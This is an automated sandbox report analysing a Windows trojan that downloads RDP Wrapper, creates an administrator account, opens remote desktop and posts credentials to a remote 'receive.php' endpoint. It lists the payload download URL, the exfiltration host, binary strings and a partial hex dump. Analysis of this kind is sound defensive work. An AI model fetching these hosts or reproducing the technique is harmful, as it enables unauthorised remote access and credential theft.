Windows Analysis Report
hloRQZmlfg.exe

Overview

General Information

Sample name:	hloRQZmlfg.exe renamed because original name is a hash value
Original sample name:	cee4e023e6afaaa51f600caec3469215.exe
Analysis ID:	1528586
MD5:	cee4e023e6afaaa51f600caec3469215
SHA1:	bf2ceff1f19f09a70863d1f8c7be0fa9662b3b04
SHA256:	da52143dd6a13c1ea3e24e735f64938830e2a3160ae08989629a43e5020d1173
Tags:	32exetrojan
Infos:

Detection

RDPWrap Tool

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a new user with administrator rights

Allows multiple concurrent remote connection

Enables remote desktop connection

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: RDP Sensitive Settings Changed

Uses netsh to modify the Windows network and firewall settings

Yara detected Costura Assembly Loader

Yara detected RDPWrap Tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to enumerate running services

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: New User Created Via Net.EXE

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hloRQZmlfg.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe	Virustotal: Detection: 22%			Perma Link
Source: http://147.45.44.104	Virustotal: Detection: 20%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	ReversingLabs: Detection: 54%
Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	Virustotal: Detection: 56%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Virustotal: Detection: 77%	Perma Link

Multi AV Scanner detection for submitted file

Source: hloRQZmlfg.exe	ReversingLabs: Detection: 63%
Source: hloRQZmlfg.exe	Virustotal: Detection: 71%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hloRQZmlfg.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: hloRQZmlfg.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to behavior

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.2

Source: hloRQZmlfg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.pdbIs>b source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.Xml.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressedlB source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: costura.costura.pdb.compressed source: hloRQZmlfg.exe
Source:	Binary string: System.Configuration.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.Configuration.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: \mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
Source:	Binary string: tem.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.DirectoryServices.pdb4 source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.Management.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: rdpclip.pdbJ source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
Source:	Binary string: mscorlib.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.Management.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: HPJo0C:\Windows\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919019826.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
Source:	Binary string: System.Core.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<>u__2Func`2Dictionary`2ToInt64<Main>d__5get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderManagementObjectSearcherResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatManagementBaseObjectManagementObjectSelectBegin
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: hloRQZmlfg.exe
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: 00000000000000000400000000000000g.PDB source: hloRQZmlfg.exe, 00000000.00000002.1923069816.0000000006B90000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER91CD.tmp.dmp.38.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_004092D8 FindFirstFileW,FindClose,	8_2_004092D8
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0040F73C FindFirstFileW,FindClose,	8_2_0040F73C
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	8_2_00408EB9

Networking

Yara detected RDPWrap Tool

Source: Yara match	File source: 8.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1434308891.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RDPWInst.exe PID: 1564, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.8:49711 -> 8.46.123.33:3389

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 01:23:04 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 193Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-PUBMATICUS AS-PUBMATICUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 104.26.12.205:80

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Code function: 8_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

8_2_0043CF60

Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: hansgborn.eu

Source: unknown

HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 193Expect: 100-continueConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:23:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n78Cuf5jALD%2BIbhiTCL4zbEwvNVt7zS7jEAlYva6PGfsrEFdGWZ5N3o80l8KBOuvC9cd%2FGlXNVidCcCS5S7I%2Fs3dcjDUXlBY9rTtQnB2KT6vpZPClKSJuOLsjYLOJus%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cf253cb5d417c8d-EWR92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eu
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eud
Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr	String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.8.dr	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: Amcache.hve.38.dr	String found in binary or memory: http://upx.sf.net
Source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.php
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.phpd
Source: RDPWInst.exe	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
Source: RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.2

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Code function: 0_2_02ADA168	0_2_02ADA168
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Code function: 0_2_02AD9150	0_2_02AD9150
Source: C:\Users\user\Desktop\hloRQZmlfg.exe	Code function: 0_2_02AD9498	0_2_02AD9498
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: 8_2_0040360C	8_2_0040360C

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: String function: 00406BE0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Code function: String function: 00404CDC appears 74 times
